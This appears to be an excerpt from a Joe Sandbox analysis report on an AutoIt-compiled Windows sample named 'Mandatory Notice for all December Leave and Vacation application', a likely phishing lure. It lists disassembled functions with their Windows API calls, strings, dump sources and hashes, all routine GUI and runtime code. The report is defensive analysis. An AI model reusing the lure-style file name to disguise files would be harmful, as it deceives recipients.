                                                      • SelectObject.GDI32(?,00000000), ref: 00FED341
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FED36C
                                                      • GetSysColor.USER32(00000010), ref: 00FED374
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00FED37B
                                                      • FrameRect.USER32(?,?,00000000), ref: 00FED38A
                                                      • DeleteObject.GDI32(00000000), ref: 00FED391
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00FED3DC
                                                      • FillRect.USER32(?,?,00000000), ref: 00FED40E
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FED439
                                                        • Part of subcall function 00FED575: GetSysColor.USER32(00000012), ref: 00FED5AE
                                                        • Part of subcall function 00FED575: SetTextColor.GDI32(?,?), ref: 00FED5B2
                                                        • Part of subcall function 00FED575: GetSysColorBrush.USER32(0000000F), ref: 00FED5C8
                                                        • Part of subcall function 00FED575: GetSysColor.USER32(0000000F), ref: 00FED5D3
                                                        • Part of subcall function 00FED575: GetSysColor.USER32(00000011), ref: 00FED5F0
                                                        • Part of subcall function 00FED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FED5FE
                                                        • Part of subcall function 00FED575: SelectObject.GDI32(?,00000000), ref: 00FED60F
                                                        • Part of subcall function 00FED575: SetBkColor.GDI32(?,00000000), ref: 00FED618
                                                        • Part of subcall function 00FED575: SelectObject.GDI32(?,?), ref: 00FED625
                                                        • Part of subcall function 00FED575: InflateRect.USER32(?,000000FF,000000FF), ref: 00FED644
                                                        • Part of subcall function 00FED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FED65B
                                                        • Part of subcall function 00FED575: GetWindowLongW.USER32(00000000,000000F0), ref: 00FED670
                                                        • Part of subcall function 00FED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FED698
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 3521893082-0
                                                      • Opcode ID: 084d06e621b8283cda9e4f336d4fba88522760c0e754ae424541de1f12142da2
                                                      • Instruction ID: ee9f908f6eea1ec646993af372cc6f20dd513513c2fcb20e32c184b3ff6d5bce
                                                      • Opcode Fuzzy Hash: 084d06e621b8283cda9e4f336d4fba88522760c0e754ae424541de1f12142da2
                                                      • Instruction Fuzzy Hash: 3291B172408301BFCB21DFA4DC08E6B7BA9FF89325F100A19F9A2961D4D776D944DB62
                                                      Function 00F9B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32 ref: 00F9B98B
                                                      • DeleteObject.GDI32(00000000), ref: 00F9B9CD
                                                      • DeleteObject.GDI32(00000000), ref: 00F9B9D8
                                                      • DestroyIcon.USER32(00000000), ref: 00F9B9E3
                                                      • DestroyWindow.USER32(00000000), ref: 00F9B9EE
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FFD2AA
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FFD2E3
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00FFD711
                                                        • Part of subcall function 00F9B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F9B759,?,00000000,?,?,?,?,00F9B72B,00000000,?), ref: 00F9BA58
                                                      • SendMessageW.USER32 ref: 00FFD758
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FFD76F
                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00FFD785
                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00FFD790
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: 134c4eb1b01e3aab7339ebf8aeb134aad288ab074e0589a76c811b6618e0a7e9
                                                      • Instruction ID: 76bb98fa974f25ca6e61b4c6a96108ba356e298ab795a2593d5a857f9d9f3c28
                                                      • Opcode Fuzzy Hash: 134c4eb1b01e3aab7339ebf8aeb134aad288ab074e0589a76c811b6618e0a7e9
                                                      • Instruction Fuzzy Hash: 5B12CE31604205DFDB25CF68D988BB9B7E6FF08314F184569EA89CB262C735EC41EB91
                                                      Function 00FCDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FCDBD6
                                                      • GetDriveTypeW.KERNEL32(?,0101DC54,?,\\.\,0101DC00), ref: 00FCDCC3
                                                      • SetErrorMode.KERNEL32(00000000,0101DC54,?,\\.\,0101DC00), ref: 00FCDE29
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 3bf94579968c5785ffd82e5e31e095b5d0f2fb7d631b2f3ace2dd838732a1975
                                                      • Instruction ID: 43d2166db6d1282a719286f624275b8abcb9f8a60f5a7c9b9f4d2858020d1dc9
                                                      • Opcode Fuzzy Hash: 3bf94579968c5785ffd82e5e31e095b5d0f2fb7d631b2f3ace2dd838732a1975
                                                      • Instruction Fuzzy Hash: 70519A31A08303ABC614EB25CED3F6DB7A8FB94715B20486EF1879F251CA64D845FB42
                                                      Function 00F8CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 8f181fb586276e7544e99f7cc4bceefeffb26b3a8e5429a79efc6bae9a0e98f2
                                                      • Instruction ID: a7d46b95badd055a2a6378d2b1e21ecabffab4149fcdb3fc7416a207e47c08bd
                                                      • Opcode Fuzzy Hash: 8f181fb586276e7544e99f7cc4bceefeffb26b3a8e5429a79efc6bae9a0e98f2
                                                      • Instruction Fuzzy Hash: 22810772A40209ABDB10BB64DD83FFF3768AF15310F044029F945AA196EB78D901F3E1
                                                      Function 00FEC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00FEC788
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00FEC83E
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00FEC859
                                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00FECB15
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0
                                                      • API String ID: 2326795674-4108050209
                                                      • Opcode ID: 2e64881f4cd30e966166df1f3537e9b5d66bd301303a2f4ecc6e249ce133de8a
                                                      • Instruction ID: 374fb35e4e2cefd766ea55612773936ab63aba259e2654ce1f7c54e58b574ca0
                                                      • Opcode Fuzzy Hash: 2e64881f4cd30e966166df1f3537e9b5d66bd301303a2f4ecc6e249ce133de8a
                                                      • Instruction Fuzzy Hash: 69F12671504380AFD7218F6ACC85BAABBE4FF89724F04052DF588D6291C779D942EBE1
                                                      Function 00FE638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,0101DC00), ref: 00FE6449
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 3964851224-45149045
                                                      • Opcode ID: 65f4877afb12fdde54d1af716b839c54c0004775771f2ca99e32aa2757478d50
                                                      • Instruction ID: 0a6d99a3c8b54324fc02ec31138629ad8418a2da42a97343c6556eb756f24cfb
                                                      • Opcode Fuzzy Hash: 65f4877afb12fdde54d1af716b839c54c0004775771f2ca99e32aa2757478d50
                                                      • Instruction Fuzzy Hash: 2AC186306043898BDA04EF11C951AAE7796BFA4394F044859F895DB3D2DF34ED4AEB82
                                                      Function 00FED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00FED5AE
                                                      • SetTextColor.GDI32(?,?), ref: 00FED5B2
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FED5C8
                                                      • GetSysColor.USER32(0000000F), ref: 00FED5D3
                                                      • CreateSolidBrush.GDI32(?), ref: 00FED5D8
                                                      • GetSysColor.USER32(00000011), ref: 00FED5F0
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FED5FE
                                                      • SelectObject.GDI32(?,00000000), ref: 00FED60F
                                                      • SetBkColor.GDI32(?,00000000), ref: 00FED618
                                                      • SelectObject.GDI32(?,?), ref: 00FED625
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FED644
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FED65B
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FED670
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FED698
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FED6BF
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00FED6DD
                                                      • DrawFocusRect.USER32(?,?), ref: 00FED6E8
                                                      • GetSysColor.USER32(00000011), ref: 00FED6F6
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FED6FE
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00FED712
                                                      • SelectObject.GDI32(?,00FED2A5), ref: 00FED729
                                                      • DeleteObject.GDI32(?), ref: 00FED734
                                                      • SelectObject.GDI32(?,?), ref: 00FED73A
                                                      • DeleteObject.GDI32(?), ref: 00FED73F
                                                      • SetTextColor.GDI32(?,?), ref: 00FED745
                                                      • SetBkColor.GDI32(?,?), ref: 00FED74F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: e123debffe8e4f45f6f38e4b9e68d6a6eeafc6b1a4a2f02595e839b3a28427c7
                                                      • Instruction ID: 9572794fe7f98c490ee3c527588b202ec5c0fa1b27c94817c1a0f7d62bbd7c2e
                                                      • Opcode Fuzzy Hash: e123debffe8e4f45f6f38e4b9e68d6a6eeafc6b1a4a2f02595e839b3a28427c7
                                                      • Instruction Fuzzy Hash: E9514A72900208BFDF219FE9DC48AEE7B79FF08324F104515FA55AB291D7769A40DB60
                                                      Function 00FEB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FEB7B0
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FEB7C1
                                                      • CharNextW.USER32(0000014E), ref: 00FEB7F0
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FEB831
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FEB847
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FEB858
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00FEB875
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00FEB8C7
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00FEB8DD
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FEB90E
                                                      • _memset.LIBCMT ref: 00FEB933
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00FEB97C
                                                      • _memset.LIBCMT ref: 00FEB9DB
                                                      • SendMessageW.USER32 ref: 00FEBA05
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00FEBA5D
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00FEBB0A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FEBB2C
                                                      • GetMenuItemInfoW.USER32(?), ref: 00FEBB76
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FEBBA3
                                                      • DrawMenuBar.USER32(?), ref: 00FEBBB2
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00FEBBDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0
                                                      • API String ID: 1073566785-4108050209
                                                      • Opcode ID: 9f4e485330660919055f04f654e52a04bfd94936b287fa385192833e50150dcd
                                                      • Instruction ID: 0382f1160df6dee31f696ef3ffacc5de5fddceeccbdc7f6585f842f9bb6670b1
                                                      • Opcode Fuzzy Hash: 9f4e485330660919055f04f654e52a04bfd94936b287fa385192833e50150dcd
                                                      • Instruction Fuzzy Hash: C6E1C2B1900258ABDF21DFA2CC84EEF7B78FF05724F108166F959AA190D7758A41EF60
                                                      Function 00FE764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00FE778A
                                                      • GetDesktopWindow.USER32 ref: 00FE779F
                                                      • GetWindowRect.USER32(00000000), ref: 00FE77A6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE7808
                                                      • DestroyWindow.USER32(?), ref: 00FE7834
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FE785D
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FE787B
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00FE78A1
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00FE78B6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00FE78C9
                                                      • IsWindowVisible.USER32(?), ref: 00FE78E9
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00FE7904
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00FE7918
                                                      • GetWindowRect.USER32(?,?), ref: 00FE7930
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00FE7956
                                                      • GetMonitorInfoW.USER32 ref: 00FE7970
                                                      • CopyRect.USER32(?,?), ref: 00FE7987
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00FE79F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 66008ec3fb0efd659153e9778318f2569f4c28909874dc45ae142a4205bb680d
                                                      • Instruction ID: 1aaeb2c61a922d5b394c738fb58666b0fca7988cc3b720e9843d20bb6a3460f7
                                                      • Opcode Fuzzy Hash: 66008ec3fb0efd659153e9778318f2569f4c28909874dc45ae142a4205bb680d
                                                      • Instruction Fuzzy Hash: C5B18E71608340AFD714EFA5C848B6EBBE4FF88310F00891DF5999B291D775E805DBA2
                                                      Function 00FC6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FC6CFB
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FC6D21
                                                      • _wcscpy.LIBCMT ref: 00FC6D4F
                                                      • _wcscmp.LIBCMT ref: 00FC6D5A
                                                      • _wcscat.LIBCMT ref: 00FC6D70
                                                      • _wcsstr.LIBCMT ref: 00FC6D7B
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FC6D97
                                                      • _wcscat.LIBCMT ref: 00FC6DE0
                                                      • _wcscat.LIBCMT ref: 00FC6DE7
                                                      • _wcsncpy.LIBCMT ref: 00FC6E12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: 945f300ad082a0e7e717b6386deb0a1ca25a03622d8fb87134c29c8df4f9fad5
                                                      • Instruction ID: 5a093332d25b55552163e4506f8682d5e180aef47b85de413b16fdf1e35af6a6
                                                      • Opcode Fuzzy Hash: 945f300ad082a0e7e717b6386deb0a1ca25a03622d8fb87134c29c8df4f9fad5
                                                      • Instruction Fuzzy Hash: 6C411572A042057BEB01AB64DD47FBF776CEF46320F044029F901E6142EF79A901B3A5
                                                      Function 00F9A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F9A939
                                                      • GetSystemMetrics.USER32(00000007), ref: 00F9A941
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F9A96C
                                                      • GetSystemMetrics.USER32(00000008), ref: 00F9A974
                                                      • GetSystemMetrics.USER32(00000004), ref: 00F9A999
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F9A9B6
                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00F9A9C6
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F9A9F9
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F9AA0D
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00F9AA2B
                                                      • GetStockObject.GDI32(00000011), ref: 00F9AA47
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9AA52
                                                        • Part of subcall function 00F9B63C: GetCursorPos.USER32(000000FF), ref: 00F9B64F
                                                        • Part of subcall function 00F9B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00F9B66C
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000001), ref: 00F9B691
                                                        • Part of subcall function 00F9B63C: GetAsyncKeyState.USER32(00000002), ref: 00F9B69F
                                                      • SetTimer.USER32(00000000,00000000,00000028,00F9AB87), ref: 00F9AA79
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      • Opcode ID: f48d35e9e9adbe7028a04d127ee07f5e44f4b4437f4ef64904fb758deecfeecb
                                                      • Instruction ID: c607dde590fee1fca19dabfb0a545b91556da250355204482692a22a2bef6d6d
                                                      • Opcode Fuzzy Hash: f48d35e9e9adbe7028a04d127ee07f5e44f4b4437f4ef64904fb758deecfeecb
                                                      • Instruction Fuzzy Hash: C5B1AD71A0020ADFEF24DFA8C985BAD7BB5FB08324F104219FA45A7294DB79E840DB51
                                                      Function 00F82EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
